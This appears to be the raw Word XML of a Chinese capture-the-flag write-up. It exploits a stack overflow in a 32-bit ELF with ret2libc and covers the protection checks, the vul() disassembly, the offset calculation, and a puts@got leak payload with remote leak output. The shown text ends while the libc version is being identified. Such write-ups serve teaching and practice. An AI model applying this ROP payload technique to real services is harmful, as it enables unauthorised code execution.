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eader-n0"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Solution</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="9" w:name="header-n3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">初始分析与保护机制检测</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">获取题目附件后，第一步进行标准的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ELF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">保护机制查验。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该文件为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">i386</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">架构的动态链接可执行程序。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启用了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">NX</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">保护，意味着无法直接在栈上运行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shellcode。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未开启</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">canary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，表明存在直接进行栈溢出攻击的可能性。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PIE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">处于关闭状态，程序的加载基址是固定的，这极大地降低了构造</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ROP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">链的难度。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开启了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Partial RELRO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，GOT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">表允许读取，便于我们实施</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> libc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址的泄露。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">核心检测结果如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Arch:       i386-32-little</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">RELRO:      Partial RELRO</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Stack:      No canary found</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">NX:         NX enabled</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">PIE:        No PIE (0x8048000)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Stripped:   No</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">综合上述保护机制的开启情况，可以得出以下初步结论：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确认可以通过栈溢出漏洞展开攻击。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鉴于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NX </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">保护机制的存在，ret2libc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应当作为首选的利用策略。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程序内部未直接提供</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">system("/bin/sh")</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的调用，故必须先完成</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> libc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址的泄露。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="9"/>
    <w:bookmarkStart w:id="10" w:name="header-n26"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">逆向分析漏洞点与计算溢出偏移量</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">接下来深入分析</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">vul()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">函数的汇编代码：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">08049205 &lt;vul</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 8049205: 55                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ebp</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 8049206: 89 e5                 mov    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ebp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esp</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 8049208: 53                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8049209: 83 ec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             sub    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">esp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0x54</w:t>
      </w:r>
      <w:r>
        <w:br/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8049227: 68 00 01 00 00    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804922c: 8d 55 b0              lea   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,[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ebp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0x50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804922f: 52                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8049230: 6a 00             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0x0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 8049234: e8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">07</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> fe ff ff        call   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">8049040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read</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">@</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">lt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从汇编片段中可以清晰地得出以下结论：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字符数组的起始地址位于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ebp-0x50</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">处。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调用了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">read(0, buf, 0x100)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，允许最多读取</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">0x100</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">个字节的数据。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显然，栈内分配给该缓冲区的容量远小于实际可读入的长度。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这印证了存在典型的栈溢出漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">随后需要计算覆盖返回地址所需的偏移量。在此过程中我曾产生过一个微小的误判，起初我主观认为偏移量应该是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">88</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，不过很快就察觉到了异常，原因在于该函数的栈帧构建过程中多执行了一次</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">push ebx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">操作，导致被寄存的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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">额外占据了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">个字节的栈空间。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">栈内的实际结构排布如下：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[ebp-0x50]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">存放着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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">变量。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从此处到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[ebp-0x4]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">均用于存放局部变量。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紧接着是备份的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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">寄存器值。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再往高地址走是压栈的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ebp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最终才是我们要劫持的函数返回地址。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">按照上述排布，到达返回地址的总长度似应为：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">0x50 + 4(save ebx) + 4(saved ebp) = 0x58 = 88 ? </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">然而必须明确一点，当我们在缓冲区中填充数据以覆盖返回地址时，并不需要特意去凑所谓的“保存</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ebx”长度，因为从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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">起始地址径直计算到返回地址的真实跨度应当为：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">0x50 + 4(saved ebp) = 84</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">经过动态调试的确认，准确的偏移量定为：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pP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</w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">该偏移量的准确性至关重要，倘若误写为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">88，将会导致程序在第一阶段</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ROP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">执行前就发生崩溃。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="10"/>
    <w:bookmarkStart w:id="11" w:name="header-n58"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 3: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">制定攻击路径，优先泄露</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> libc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">基址</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">鉴于目标程序不存在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> canary </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">保护，并且未启用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">PIE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，构建首段</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ROP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">链的最佳方案是直接触发以下调用：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">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puts@got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随后控制执行流跳转回</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">vul()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">函数，以便注入我们的第二阶段</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">采用此策略的理由如下：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程序的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">puts@plt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址是静态不变的。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puts@got</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">表项内存储了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> libc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">库中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函数的绝对运行地址。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一旦成功获取了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> libc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的真实地址，便能顺利推算出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函数的位置。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">首段攻击载荷的构造如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">payload1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elf.plt[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elf.sym[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"vul"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elf.got[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这段载荷的运作机制为：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利用栈溢出将返回地址覆盖为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">puts@plt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的地址。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puts@got</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">作为参数传递给调用的函数。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借由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输出</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GOT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">表内存放的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> libc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">函数实际地址。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函数调用完毕后，控制流重新指回</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">vul()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使得程序再次执行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逻辑，为我们发送后续</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ROP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">链提供窗口。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在与远程服务器交互时，成功泄露的前</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">个地址数据如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">e0 61 e4 f7  e0 3d df f7  c0 69 e4 f7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4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字节为单位进行解析，首个地址便代表了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函数在内存中的真实地址：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">puts = 0xf7e171e0</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="11"/>
    <w:bookmarkStart w:id="12" w:name="header-n88"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 4: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">鉴别远程环境</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> libc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">版本并计算</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> system </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在获取到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函数的泄露地址后，接下来的核心任务是敲定远程服务器所使用的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> libc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">版本。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">针对这一步，我并未采用盲目猜测的办法，而是结合连续泄露数据的低位特征来逐步筛选。考虑到在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">puts@got</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">之后还紧挨着其他的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GOT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">表条目，这些额外的信息完全可以用来协助比对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">__libc_start_main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setvbuf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
